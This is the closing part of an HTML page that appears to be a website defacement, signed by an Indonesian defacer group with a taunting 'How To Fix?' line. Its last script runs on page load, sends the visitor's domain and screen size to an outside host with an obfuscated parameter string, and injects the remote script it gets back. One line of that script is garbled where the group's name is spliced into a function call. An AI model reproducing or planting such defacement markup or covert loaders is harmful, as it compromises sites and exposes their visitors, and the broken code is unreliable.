				<br><br>
				<span>- A A A AISYAH Kujatuh Cinta A -</span><br>
				<span>How To Fix?</span><br>
				<span>https://instagram.com/tulungagungcyberlink</span><br>
				<font color="red">|</font> TULUNGAGUNG DARKNET <font color="red">|</font> ALL INDONESIA DEFACER <font color="red">|</font>
			</p>
		</main>
		
		<script type="text/javascript">
			document.getElementById("example2").style.display = "block";
			new TypingText(document.getElementById("example1"));
			new TypingText(document.getElementById("example2"), 80, function(i){
				var ar	 = new Array("_"," ","_","_"); return " " + ar[i.length %
				ar.length];
			});
			TypingText.runAll();
		</script>
		<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mDGxB0PblDHA%2bTOCJPYaGpc%2f0YckAGj6aK8lyMDTmEjchVY1QIa99Xbd1H74ph12%2b1iO8zW05G57Cz9AfcbzYn3wJ%2fPY28R6rdaVgmZHyVUbEYOPgWiowj8%2bjt7cHcQSWlEHTzN%2f%2fUpZiCU2p9cMVc6jD%2fC4oiHqlOipmHmHJBYH30xfNe8XuShcvLqLXNDAXJ26UL7bTrBUVAI%2brkL%2bZm7DQ7KkBVYigbMTYmWmv2hdVs23t1JlYNaxfYQlGBG%2b0BQLAz%2bDb%2b7bfGHwV7X4sXHALYiWIRGvqfhi6wqcoafRedp3iYhVbWywAw0lax5MeH%2bTiZPgPWU18fZVFP%2fffxyh%2bTqr8WWAWteVcowgrcolYJCbPdQl1OYfyVfqaBjj0jQrq4KrsSr9YngAtQsNHpLLSWe5gZ4BBnkJsaBNfxTdMtNXN36soLyXXBVuc%2fdu3F8W3RaHbEs0iN2QmtRlsmMJn9nbewwA17Rp3vEqLEQnY5O2LLQaNfFbhVdmNEaa1Rck4KtB8kkI6lC6M0gVkYA%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagNaby Tulungagung Cyber Team('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
	</body>
</html>